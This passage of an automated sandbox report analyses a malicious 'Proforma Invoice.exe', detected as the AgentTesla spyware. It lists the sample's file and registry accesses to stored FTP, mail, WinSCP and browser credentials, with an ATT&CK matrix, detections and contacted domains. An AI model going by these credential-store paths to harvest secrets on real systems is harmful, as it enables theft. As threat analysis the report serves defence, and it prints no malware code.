                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Users\user\Desktop\Proforma Invoice.exe VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0.2.Proforma Invoice.exe.3846860.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.Proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Proforma Invoice.exe.3846860.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Proforma Invoice.exe.374c7b0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Proforma Invoice.exe.36f5390.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.560307423.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.310366268.00000000035A9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 6844, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 6804, type: MEMORYSTR
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Users\user\Desktop\Proforma Invoice.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: Yara matchFile source: 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 6804, type: MEMORYSTR

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 0.2.Proforma Invoice.exe.3846860.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.Proforma Invoice.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Proforma Invoice.exe.3846860.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Proforma Invoice.exe.374c7b0.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Proforma Invoice.exe.36f5390.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.560307423.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.310366268.00000000035A9000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.562365344.0000000002E31000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 6844, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: Proforma Invoice.exe PID: 6804, type: MEMORYSTR

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Path InterceptionProcess Injection12Masquerading11OS Credential Dumping2Security Software Discovery211Remote ServicesEmail Collection1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1Input Capture21Process Discovery2Remote Desktop ProtocolInput Capture21Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion131Credentials in Registry1Virtualization/Sandbox Evasion131SMB/Windows Admin SharesArchive Collected Data11Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection12NTDSApplication Window Discovery1Distributed Component Object ModelData from Local System2Scheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information2Cached Domain CredentialsSystem Information Discovery114VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      Proforma Invoice.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      4.2.Proforma Invoice.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      webmail.karanex.com1%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://rafeBU.com2%VirustotalBrowse
                      http://rafeBU.com0%Avira URL Cloudsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://webmail.karanex.com1%VirustotalBrowse
                      http://webmail.karanex.com0%Avira URL Cloudsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.collada.org/2005/11/COLLADASchema9Done0%URL Reputationsafe
                      https://api.ipify.org%$0%Avira URL Cloudsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
